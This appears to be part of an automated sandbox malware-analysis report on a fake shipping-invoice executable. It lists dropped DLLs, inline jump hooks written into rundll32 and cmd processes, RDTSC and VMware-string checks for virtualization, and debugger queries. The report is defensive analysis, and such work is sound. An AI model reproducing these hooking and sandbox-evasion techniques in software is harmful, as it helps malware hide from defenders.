          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409412 push ss; ret 2_2_00409415
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B42C push eax; ret 2_2_0041B432
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414D93 push 5C0B9774h; iretd 2_2_00414DBA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414EE9 push ebp; ret 2_2_00414F0A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B8D0D1 push ecx; ret 2_2_04B8D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0375D0D1 push ecx; ret 9_2_0375D0E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3C2 push eax; ret 9_2_02F7B3C8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3CB push eax; ret 9_2_02F7B432
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B375 push eax; ret 9_2_02F7B3C8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7C952 push es; ret 9_2_02F7C954
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74EE9 push ebp; ret 9_2_02F74F0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B42C push eax; ret 9_2_02F7B432
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F69412 push ss; ret 9_2_02F69415
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74D93 push 5C0B9774h; iretd 9_2_02F74DBA
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\Prehnite.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408880 rdtsc 2_2_00408880
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exeJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -190000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6744Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 2928Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406469 FindFirstFileA,FindClose,0_2_00406469
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402765 FindFirstFileA,0_2_00402765
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040592E
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.923834797.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.709985267.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.701787722.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.710616810.000000000A9CC000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000004.00000000.710247999.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000002.923295424.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408880 rdtsc 2_2_00408880
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409AF0 LdrLoadDll,2_2_00409AF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10004CBC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,1_2_1000734B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08CD6 mov eax, dword ptr fs:[00000030h]2_2_04C08CD6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF14FB mov eax, dword ptr fs:[00000030h]2_2_04BF14FB
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6BC2C mov eax, dword ptr fs:[00000030h]2_2_04B6BC2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1C06 mov eax, dword ptr fs:[00000030h]2_2_04BF1C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]2_2_04C0740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]2_2_04C0740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0740D mov eax, dword ptr fs:[00000030h]2_2_04C0740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5746D mov eax, dword ptr fs:[00000030h]2_2_04B5746D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B635A1 mov eax, dword ptr fs:[00000030h]2_2_04B635A1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]2_2_04B32D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]2_2_04B32D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]2_2_04B32D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]2_2_04B32D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B32D8A mov eax, dword ptr fs:[00000030h]2_2_04B32D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BE8DF1 mov eax, dword ptr fs:[00000030h]2_2_04BE8DF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3AD30 mov eax, dword ptr fs:[00000030h]2_2_04B3AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]2_2_04B5C577
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C577 mov eax, dword ptr fs:[00000030h]2_2_04B5C577
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B57D50 mov eax, dword ptr fs:[00000030h]2_2_04B57D50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08D34 mov eax, dword ptr fs:[00000030h]2_2_04C08D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B73D43 mov eax, dword ptr fs:[00000030h]2_2_04B73D43
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08ED6 mov eax, dword ptr fs:[00000030h]2_2_04C08ED6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB46A7 mov eax, dword ptr fs:[00000030h]2_2_04BB46A7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFE87 mov eax, dword ptr fs:[00000030h]2_2_04BCFE87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B616E0 mov ecx, dword ptr fs:[00000030h]2_2_04B616E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]2_2_04C00EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]2_2_04C00EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C00EA5 mov eax, dword ptr fs:[00000030h]2_2_04C00EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B636CC mov eax, dword ptr fs:[00000030h]2_2_04B636CC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEFEC0 mov eax, dword ptr fs:[00000030h]2_2_04BEFEC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEFE3F mov eax, dword ptr fs:[00000030h]2_2_04BEFE3F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6E730 mov eax, dword ptr fs:[00000030h]2_2_04B6E730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]2_2_04B34F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B34F2E mov eax, dword ptr fs:[00000030h]2_2_04B34F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08F6A mov eax, dword ptr fs:[00000030h]2_2_04C08F6A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]2_2_04BCFF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BCFF10 mov eax, dword ptr fs:[00000030h]2_2_04BCFF10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]2_2_04C0070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C0070D mov eax, dword ptr fs:[00000030h]2_2_04C0070D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4EF40 mov eax, dword ptr fs:[00000030h]2_2_04B4EF40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov ecx, dword ptr fs:[00000030h]2_2_04B6F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]2_2_04B6F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6F0BF mov eax, dword ptr fs:[00000030h]2_2_04B6F0BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B790AF mov eax, dword ptr fs:[00000030h]2_2_04B790AF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39080 mov eax, dword ptr fs:[00000030h]2_2_04B39080
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]2_2_04B4B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]2_2_04B4B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]2_2_04B4B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B02A mov eax, dword ptr fs:[00000030h]2_2_04B4B02A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]2_2_04BB7016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]2_2_04BB7016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BB7016 mov eax, dword ptr fs:[00000030h]2_2_04BB7016
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C01074 mov eax, dword ptr fs:[00000030h]2_2_04C01074
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF2073 mov eax, dword ptr fs:[00000030h]2_2_04BF2073
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6A185 mov eax, dword ptr fs:[00000030h]2_2_04B6A185
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5C182 mov eax, dword ptr fs:[00000030h]2_2_04B5C182
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]2_2_04B3B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]2_2_04B3B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B1E1 mov eax, dword ptr fs:[00000030h]2_2_04B3B1E1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov eax, dword ptr fs:[00000030h]2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120 mov ecx, dword ptr fs:[00000030h]2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]2_2_04B39100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]2_2_04B39100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39100 mov eax, dword ptr fs:[00000030h]2_2_04B39100
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]2_2_04B3B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3B171 mov eax, dword ptr fs:[00000030h]2_2_04B3B171
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]2_2_04B5B944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B5B944 mov eax, dword ptr fs:[00000030h]2_2_04B5B944
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]2_2_04B352A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]2_2_04B352A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]2_2_04B352A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]2_2_04B352A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B352A5 mov eax, dword ptr fs:[00000030h]2_2_04B352A5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]2_2_04B6D294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6D294 mov eax, dword ptr fs:[00000030h]2_2_04B6D294
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]2_2_04BEB260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BEB260 mov eax, dword ptr fs:[00000030h]2_2_04BEB260
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]2_2_04B39240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]2_2_04B39240
